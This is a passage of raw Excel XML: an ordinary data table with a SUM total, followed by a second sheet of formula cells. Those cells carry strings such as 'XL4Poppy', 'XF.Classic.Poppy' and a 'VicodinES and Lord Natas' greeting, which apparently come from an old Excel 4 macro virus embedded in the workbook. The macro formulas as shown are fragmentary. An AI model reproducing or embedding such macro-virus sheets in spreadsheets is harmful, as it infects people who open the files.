        <v>101</v>
      </c>
    </row>
    <row r="35" spans="1:9" s="10" customFormat="1" ht="33.75" customHeight="1">
      <c r="A35" s="19"/>
      <c r="B35" s="19"/>
      <c r="C35" s="6" t="s">
        <v>99</v>
      </c>
      <c r="D35" s="6">
        <v>1</v>
      </c>
      <c r="E35" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F35" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G35" s="19"/>
      <c r="H35" s="27"/>
      <c r="I35" s="19"/>
    </row>
    <row r="36" spans="1:9" s="10" customFormat="1" ht="19.5" customHeight="1">
      <c r="A36" s="18" t="s">
        <v>111</v>
      </c>
      <c r="B36" s="18" t="s">
        <v>112</v>
      </c>
      <c r="C36" s="6" t="s">
        <v>115</v>
      </c>
      <c r="D36" s="6">
        <v>1</v>
      </c>
      <c r="E36" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F36" s="6" t="s">
        <v>122</v>
      </c>
      <c r="G36" s="6" t="s">
        <v>142</v>
      </c>
      <c r="H36" s="11" t="s">
        <v>141</v>
      </c>
      <c r="I36" s="18" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="37" spans="1:9" s="10" customFormat="1" ht="19.5" customHeight="1">
      <c r="A37" s="20"/>
      <c r="B37" s="19"/>
      <c r="C37" s="6" t="s">
        <v>149</v>
      </c>
      <c r="D37" s="6">
        <v>1</v>
      </c>
      <c r="E37" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F37" s="6" t="s">
        <v>122</v>
      </c>
      <c r="G37" s="11" t="s">
        <v>148</v>
      </c>
      <c r="H37" s="11" t="s">
        <v>159</v>
      </c>
      <c r="I37" s="19"/>
    </row>
    <row r="38" spans="1:9" s="10" customFormat="1" ht="19.5" customHeight="1">
      <c r="A38" s="20"/>
      <c r="B38" s="18" t="s">
        <v>113</v>
      </c>
      <c r="C38" s="6" t="s">
        <v>116</v>
      </c>
      <c r="D38" s="6">
        <v>1</v>
      </c>
      <c r="E38" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F38" s="6" t="s">
        <v>122</v>
      </c>
      <c r="G38" s="11" t="s">
        <v>143</v>
      </c>
      <c r="H38" s="11" t="s">
        <v>135</v>
      </c>
      <c r="I38" s="18" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="39" spans="1:9" s="10" customFormat="1" ht="24" customHeight="1">
      <c r="A39" s="20"/>
      <c r="B39" s="20"/>
      <c r="C39" s="6" t="s">
        <v>117</v>
      </c>
      <c r="D39" s="6">
        <v>1</v>
      </c>
      <c r="E39" s="6" t="s">
        <v>123</v>
      </c>
      <c r="F39" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G39" s="11" t="s">
        <v>144</v>
      </c>
      <c r="H39" s="11" t="s">
        <v>160</v>
      </c>
      <c r="I39" s="20"/>
    </row>
    <row r="40" spans="1:9" s="10" customFormat="1" ht="18.75" customHeight="1">
      <c r="A40" s="20"/>
      <c r="B40" s="20"/>
      <c r="C40" s="6" t="s">
        <v>118</v>
      </c>
      <c r="D40" s="6">
        <v>1</v>
      </c>
      <c r="E40" s="6" t="s">
        <v>123</v>
      </c>
      <c r="F40" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G40" s="10" t="s">
        <v>145</v>
      </c>
      <c r="H40" s="11" t="s">
        <v>161</v>
      </c>
      <c r="I40" s="20"/>
    </row>
    <row r="41" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A41" s="20"/>
      <c r="B41" s="19"/>
      <c r="C41" s="6" t="s">
        <v>119</v>
      </c>
      <c r="D41" s="6">
        <v>6</v>
      </c>
      <c r="E41" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F41" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G41" s="6" t="s">
        <v>136</v>
      </c>
      <c r="H41" s="14" t="s">
        <v>162</v>
      </c>
      <c r="I41" s="19"/>
    </row>
    <row r="42" spans="1:9" s="10" customFormat="1" ht="29.25" customHeight="1">
      <c r="A42" s="20"/>
      <c r="B42" s="18" t="s">
        <v>114</v>
      </c>
      <c r="C42" s="6" t="s">
        <v>116</v>
      </c>
      <c r="D42" s="6">
        <v>1</v>
      </c>
      <c r="E42" s="6" t="s">
        <v>124</v>
      </c>
      <c r="F42" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G42" s="6" t="s">
        <v>146</v>
      </c>
      <c r="H42" s="14" t="s">
        <v>126</v>
      </c>
      <c r="I42" s="18" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="43" spans="1:9" s="10" customFormat="1" ht="27.75" customHeight="1">
      <c r="A43" s="20"/>
      <c r="B43" s="20"/>
      <c r="C43" s="6" t="s">
        <v>118</v>
      </c>
      <c r="D43" s="6">
        <v>1</v>
      </c>
      <c r="E43" s="6" t="s">
        <v>124</v>
      </c>
      <c r="F43" s="6" t="s">
        <v>158</v>
      </c>
      <c r="G43" s="6" t="s">
        <v>145</v>
      </c>
      <c r="H43" s="14" t="s">
        <v>125</v>
      </c>
      <c r="I43" s="20"/>
    </row>
    <row r="44" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A44" s="20"/>
      <c r="B44" s="20"/>
      <c r="C44" s="6" t="s">
        <v>120</v>
      </c>
      <c r="D44" s="6">
        <v>1</v>
      </c>
      <c r="E44" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F44" s="6" t="s">
        <v>122</v>
      </c>
      <c r="G44" s="14" t="s">
        <v>147</v>
      </c>
      <c r="H44" s="14" t="s">
        <v>132</v>
      </c>
      <c r="I44" s="20"/>
    </row>
    <row r="45" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A45" s="19"/>
      <c r="B45" s="19"/>
      <c r="C45" s="6" t="s">
        <v>121</v>
      </c>
      <c r="D45" s="6">
        <v>2</v>
      </c>
      <c r="E45" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F45" s="6" t="s">
        <v>158</v>
      </c>
      <c r="G45" s="14" t="s">
        <v>133</v>
      </c>
      <c r="H45" s="14" t="s">
        <v>134</v>
      </c>
      <c r="I45" s="19"/>
    </row>
    <row r="46" spans="1:9" ht="21.75" customHeight="1">
      <c r="A46" s="6" t="s">
        <v>7</v>
      </c>
      <c r="B46" s="5"/>
      <c r="C46" s="5"/>
      <c r="D46" s="5">
        <f>SUM(D3:D45)</f>
        <v>62</v>
      </c>
      <c r="E46" s="5"/>
      <c r="F46" s="5"/>
      <c r="G46" s="5"/>
      <c r="H46" s="7"/>
      <c r="I46" s="5"/>
    </row>
    <row r="47" spans="1:9" ht="15" customHeight="1">
      <c r="A47" s="15"/>
      <c r="B47" s="16"/>
      <c r="C47" s="16"/>
      <c r="D47" s="16"/>
      <c r="E47" s="16"/>
      <c r="F47" s="16"/>
      <c r="G47" s="16"/>
      <c r="H47" s="17"/>
      <c r="I47" s="16"/>
    </row>
    <row r="48" spans="1:9" ht="14.25" customHeight="1">
      <c r="A48" s="28" t="s">
        <v>166</v>
      </c>
      <c r="B48" s="28"/>
      <c r="C48" s="28"/>
      <c r="D48" s="28"/>
      <c r="E48" s="28"/>
      <c r="F48" s="28"/>
      <c r="G48" s="28"/>
      <c r="H48" s="28"/>
      <c r="I48" s="28"/>
    </row>
    <row r="49" spans="1:9" ht="14.25">
      <c r="A49" s="28" t="s">
        <v>167</v>
      </c>
      <c r="B49" s="28"/>
      <c r="C49" s="28"/>
      <c r="D49" s="28"/>
      <c r="E49" s="28"/>
      <c r="F49" s="28"/>
      <c r="G49" s="28"/>
      <c r="H49" s="28"/>
      <c r="I49" s="28"/>
    </row>
    <row r="50" spans="1:9" ht="14.25">
      <c r="A50" s="4"/>
      <c r="B50" s="4"/>
      <c r="C50" s="4"/>
      <c r="D50" s="4"/>
      <c r="E50" s="4"/>
      <c r="F50" s="4"/>
      <c r="G50" s="4"/>
      <c r="H50" s="8"/>
      <c r="I50" s="4"/>
    </row>
    <row r="51" spans="1:9" ht="14.25">
      <c r="A51" s="4"/>
      <c r="B51" s="4"/>
      <c r="C51" s="4"/>
      <c r="D51" s="4"/>
      <c r="E51" s="4"/>
      <c r="F51" s="4"/>
      <c r="G51" s="4"/>
      <c r="H51" s="8"/>
      <c r="I51" s="4"/>
    </row>
    <row r="52" spans="1:9" ht="14.25">
      <c r="A52" s="4"/>
      <c r="B52" s="4"/>
      <c r="C52" s="4"/>
      <c r="D52" s="4"/>
      <c r="E52" s="4"/>
      <c r="F52" s="4"/>
      <c r="G52" s="4"/>
      <c r="H52" s="8"/>
      <c r="I52" s="4"/>
    </row>
    <row r="53" spans="1:9" ht="14.25">
      <c r="A53" s="4"/>
      <c r="B53" s="4"/>
      <c r="C53" s="4"/>
      <c r="D53" s="4"/>
      <c r="E53" s="4"/>
      <c r="F53" s="4"/>
      <c r="G53" s="4"/>
      <c r="H53" s="8"/>
      <c r="I53" s="4"/>
    </row>
    <row r="54" spans="1:9" ht="14.25">
      <c r="A54" s="4"/>
      <c r="B54" s="4"/>
      <c r="C54" s="4"/>
      <c r="D54" s="4"/>
      <c r="E54" s="4"/>
      <c r="F54" s="4"/>
      <c r="G54" s="4"/>
      <c r="H54" s="8"/>
      <c r="I54" s="4"/>
    </row>
    <row r="55" spans="1:9" ht="14.25">
      <c r="A55" s="4"/>
      <c r="B55" s="4"/>
      <c r="C55" s="4"/>
      <c r="D55" s="4"/>
      <c r="E55" s="4"/>
      <c r="F55" s="4"/>
      <c r="G55" s="4"/>
      <c r="H55" s="8"/>
      <c r="I55" s="4"/>
    </row>
    <row r="56" spans="1:9" ht="14.25">
      <c r="A56" s="4"/>
      <c r="B56" s="4"/>
      <c r="C56" s="4"/>
      <c r="D56" s="4"/>
      <c r="E56" s="4"/>
      <c r="F56" s="4"/>
      <c r="G56" s="4"/>
      <c r="H56" s="8"/>
      <c r="I56" s="4"/>
    </row>
    <row r="57" spans="1:9" ht="14.25">
      <c r="A57" s="4"/>
      <c r="B57" s="4"/>
      <c r="C57" s="4"/>
      <c r="D57" s="4"/>
      <c r="E57" s="4"/>
      <c r="F57" s="4"/>
      <c r="G57" s="4"/>
      <c r="H57" s="8"/>
      <c r="I57" s="4"/>
    </row>
    <row r="58" spans="1:9" ht="14.25">
      <c r="A58" s="4"/>
      <c r="B58" s="4"/>
      <c r="C58" s="4"/>
      <c r="D58" s="4"/>
      <c r="E58" s="4"/>
      <c r="F58" s="4"/>
      <c r="G58" s="4"/>
      <c r="H58" s="8"/>
      <c r="I58" s="4"/>
    </row>
    <row r="59" spans="1:9" ht="14.25">
      <c r="A59" s="4"/>
      <c r="B59" s="4"/>
      <c r="C59" s="4"/>
      <c r="D59" s="4"/>
      <c r="E59" s="4"/>
      <c r="F59" s="4"/>
      <c r="G59" s="4"/>
      <c r="H59" s="8"/>
      <c r="I59" s="4"/>
    </row>
    <row r="60" spans="1:9" ht="14.25">
      <c r="A60" s="4"/>
      <c r="B60" s="4"/>
      <c r="C60" s="4"/>
      <c r="D60" s="4"/>
      <c r="E60" s="4"/>
      <c r="F60" s="4"/>
      <c r="G60" s="4"/>
      <c r="H60" s="8"/>
      <c r="I60" s="4"/>
    </row>
    <row r="61" spans="1:9" ht="14.25">
      <c r="A61" s="4"/>
      <c r="B61" s="4"/>
      <c r="C61" s="4"/>
      <c r="D61" s="4"/>
      <c r="E61" s="4"/>
      <c r="F61" s="4"/>
      <c r="G61" s="4"/>
      <c r="H61" s="8"/>
      <c r="I61" s="4"/>
    </row>
    <row r="62" spans="1:9" ht="14.25">
      <c r="A62" s="4"/>
      <c r="B62" s="4"/>
      <c r="C62" s="4"/>
      <c r="D62" s="4"/>
      <c r="E62" s="4"/>
      <c r="F62" s="4"/>
      <c r="G62" s="4"/>
      <c r="H62" s="8"/>
      <c r="I62" s="4"/>
    </row>
    <row r="63" spans="1:9" ht="14.25">
      <c r="A63" s="4"/>
      <c r="B63" s="4"/>
      <c r="C63" s="4"/>
      <c r="D63" s="4"/>
      <c r="E63" s="4"/>
      <c r="F63" s="4"/>
      <c r="G63" s="4"/>
      <c r="H63" s="8"/>
      <c r="I63" s="4"/>
    </row>
    <row r="64" spans="1:9" ht="14.25">
      <c r="A64" s="4"/>
      <c r="B64" s="4"/>
      <c r="C64" s="4"/>
      <c r="D64" s="4"/>
      <c r="E64" s="4"/>
      <c r="F64" s="4"/>
      <c r="G64" s="4"/>
      <c r="H64" s="8"/>
      <c r="I64" s="4"/>
    </row>
    <row r="65" spans="1:9" ht="14.25">
      <c r="A65" s="4"/>
      <c r="B65" s="4"/>
      <c r="C65" s="4"/>
      <c r="D65" s="4"/>
      <c r="E65" s="4"/>
      <c r="F65" s="4"/>
      <c r="G65" s="4"/>
      <c r="H65" s="8"/>
      <c r="I65" s="4"/>
    </row>
    <row r="66" spans="1:9" ht="14.25">
      <c r="A66" s="4"/>
      <c r="B66" s="4"/>
      <c r="C66" s="4"/>
      <c r="D66" s="4"/>
      <c r="E66" s="4"/>
      <c r="F66" s="4"/>
      <c r="G66" s="4"/>
      <c r="H66" s="8"/>
      <c r="I66" s="4"/>
    </row>
    <row r="67" spans="1:9" ht="14.25">
      <c r="A67" s="4"/>
      <c r="B67" s="4"/>
      <c r="C67" s="4"/>
      <c r="D67" s="4"/>
      <c r="E67" s="4"/>
      <c r="F67" s="4"/>
      <c r="G67" s="4"/>
      <c r="H67" s="8"/>
      <c r="I67" s="4"/>
    </row>
    <row r="68" spans="1:9" ht="14.25">
      <c r="A68" s="4"/>
      <c r="B68" s="4"/>
      <c r="C68" s="4"/>
      <c r="D68" s="4"/>
      <c r="E68" s="4"/>
      <c r="F68" s="4"/>
      <c r="G68" s="4"/>
      <c r="H68" s="8"/>
      <c r="I68" s="4"/>
    </row>
    <row r="69" spans="1:9" ht="14.25">
      <c r="A69" s="4"/>
      <c r="B69" s="4"/>
      <c r="C69" s="4"/>
      <c r="D69" s="4"/>
      <c r="E69" s="4"/>
      <c r="F69" s="4"/>
      <c r="G69" s="4"/>
      <c r="H69" s="8"/>
      <c r="I69" s="4"/>
    </row>
    <row r="70" spans="1:9" ht="14.25">
      <c r="A70" s="4"/>
      <c r="B70" s="4"/>
      <c r="C70" s="4"/>
      <c r="D70" s="4"/>
      <c r="E70" s="4"/>
      <c r="F70" s="4"/>
      <c r="G70" s="4"/>
      <c r="H70" s="8"/>
      <c r="I70" s="4"/>
    </row>
    <row r="71" spans="1:9" ht="14.25">
      <c r="A71" s="4"/>
      <c r="B71" s="4"/>
      <c r="C71" s="4"/>
      <c r="D71" s="4"/>
      <c r="E71" s="4"/>
      <c r="F71" s="4"/>
      <c r="G71" s="4"/>
      <c r="H71" s="8"/>
      <c r="I71" s="4"/>
    </row>
    <row r="72" spans="1:9" ht="14.25">
      <c r="A72" s="4"/>
      <c r="B72" s="4"/>
      <c r="C72" s="4"/>
      <c r="D72" s="4"/>
      <c r="E72" s="4"/>
      <c r="F72" s="4"/>
      <c r="G72" s="4"/>
      <c r="H72" s="8"/>
      <c r="I72" s="4"/>
    </row>
    <row r="73" spans="1:9" ht="14.25">
      <c r="A73" s="4"/>
      <c r="B73" s="4"/>
      <c r="C73" s="4"/>
      <c r="D73" s="4"/>
      <c r="E73" s="4"/>
      <c r="F73" s="4"/>
      <c r="G73" s="4"/>
      <c r="H73" s="8"/>
      <c r="I73" s="4"/>
    </row>
    <row r="74" spans="1:9" ht="14.25">
      <c r="A74" s="4"/>
      <c r="B74" s="4"/>
      <c r="C74" s="4"/>
      <c r="D74" s="4"/>
      <c r="E74" s="4"/>
      <c r="F74" s="4"/>
      <c r="G74" s="4"/>
      <c r="H74" s="8"/>
      <c r="I74" s="4"/>
    </row>
    <row r="75" spans="1:9" ht="14.25">
      <c r="A75" s="4"/>
      <c r="B75" s="4"/>
      <c r="C75" s="4"/>
      <c r="D75" s="4"/>
      <c r="E75" s="4"/>
      <c r="F75" s="4"/>
      <c r="G75" s="4"/>
      <c r="H75" s="8"/>
      <c r="I75" s="4"/>
    </row>
    <row r="76" spans="1:9" ht="14.25">
      <c r="A76" s="4"/>
      <c r="B76" s="4"/>
      <c r="C76" s="4"/>
      <c r="D76" s="4"/>
      <c r="E76" s="4"/>
      <c r="F76" s="4"/>
      <c r="G76" s="4"/>
      <c r="H76" s="8"/>
      <c r="I76" s="4"/>
    </row>
    <row r="77" spans="1:9" ht="14.25">
      <c r="A77" s="4"/>
      <c r="B77" s="4"/>
      <c r="C77" s="4"/>
      <c r="D77" s="4"/>
      <c r="E77" s="4"/>
      <c r="F77" s="4"/>
      <c r="G77" s="4"/>
      <c r="H77" s="8"/>
      <c r="I77" s="4"/>
    </row>
    <row r="78" spans="1:9" ht="14.25">
      <c r="A78" s="4"/>
      <c r="B78" s="4"/>
      <c r="C78" s="4"/>
      <c r="D78" s="4"/>
      <c r="E78" s="4"/>
      <c r="F78" s="4"/>
      <c r="G78" s="4"/>
      <c r="H78" s="8"/>
      <c r="I78" s="4"/>
    </row>
    <row r="79" spans="1:9" ht="14.25">
      <c r="A79" s="4"/>
      <c r="B79" s="4"/>
      <c r="C79" s="4"/>
      <c r="D79" s="4"/>
      <c r="E79" s="4"/>
      <c r="F79" s="4"/>
      <c r="G79" s="4"/>
      <c r="H79" s="8"/>
      <c r="I79" s="4"/>
    </row>
    <row r="80" spans="1:9" ht="14.25">
      <c r="A80" s="4"/>
      <c r="B80" s="4"/>
      <c r="C80" s="4"/>
      <c r="D80" s="4"/>
      <c r="E80" s="4"/>
      <c r="F80" s="4"/>
      <c r="G80" s="4"/>
      <c r="H80" s="8"/>
      <c r="I80" s="4"/>
    </row>
    <row r="81" spans="1:9" ht="14.25">
      <c r="A81" s="4"/>
      <c r="B81" s="4"/>
      <c r="C81" s="4"/>
      <c r="D81" s="4"/>
      <c r="E81" s="4"/>
      <c r="F81" s="4"/>
      <c r="G81" s="4"/>
      <c r="H81" s="8"/>
      <c r="I81" s="4"/>
    </row>
  </sheetData>
  <mergeCells count="34">
    <mergeCell ref="A48:I48"/>
    <mergeCell ref="A49:I49"/>
    <mergeCell ref="A25:A28"/>
    <mergeCell ref="H34:H35"/>
    <mergeCell ref="I34:I35"/>
    <mergeCell ref="I29:I33"/>
    <mergeCell ref="I25:I27"/>
    <mergeCell ref="B25:B27"/>
    <mergeCell ref="A29:A35"/>
    <mergeCell ref="B34:B35"/>
    <mergeCell ref="A36:A45"/>
    <mergeCell ref="A12:A16"/>
    <mergeCell ref="G34:G35"/>
    <mergeCell ref="I21:I24"/>
    <mergeCell ref="B21:B24"/>
    <mergeCell ref="B29:B33"/>
    <mergeCell ref="G29:G32"/>
    <mergeCell ref="H29:H32"/>
    <mergeCell ref="A21:A24"/>
    <mergeCell ref="B18:B20"/>
    <mergeCell ref="A1:I1"/>
    <mergeCell ref="I3:I9"/>
    <mergeCell ref="B3:B9"/>
    <mergeCell ref="A3:A9"/>
    <mergeCell ref="B12:B13"/>
    <mergeCell ref="I12:I13"/>
    <mergeCell ref="A18:A20"/>
    <mergeCell ref="I18:I20"/>
    <mergeCell ref="I36:I37"/>
    <mergeCell ref="I38:I41"/>
    <mergeCell ref="I42:I45"/>
    <mergeCell ref="B36:B37"/>
    <mergeCell ref="B38:B41"/>
    <mergeCell ref="B42:B45"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.1968503937007874" right="0.1968503937007874" top="0.56" bottom="0.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41"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <sheetData>
    <row r="3" ht="14.25">
      <c r="AI3" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="14.25">
      <c r="A25" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="14.25">
      <c r="A26" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="14.25">
      <c r="A27" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="14.25">
      <c r="A28" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="29" ht="14.25">
      <c r="A29" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="14.25">
      <c r="C34" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="14.25">
      <c r="A35" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="14.25">
      <c r="A36" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="14.25">
      <c r="A37" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="14.25">
      <c r="A38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="14.25">
      <c r="A39" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" t="b">
        <f>"XF.Classic.Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="14.25">
      <c r="A40" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="14.25">
      <c r="A41" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C41" t="b">
        <f>=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2013-11-07T00:33:58Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-10-23T01:58:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-07T01:22:52Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>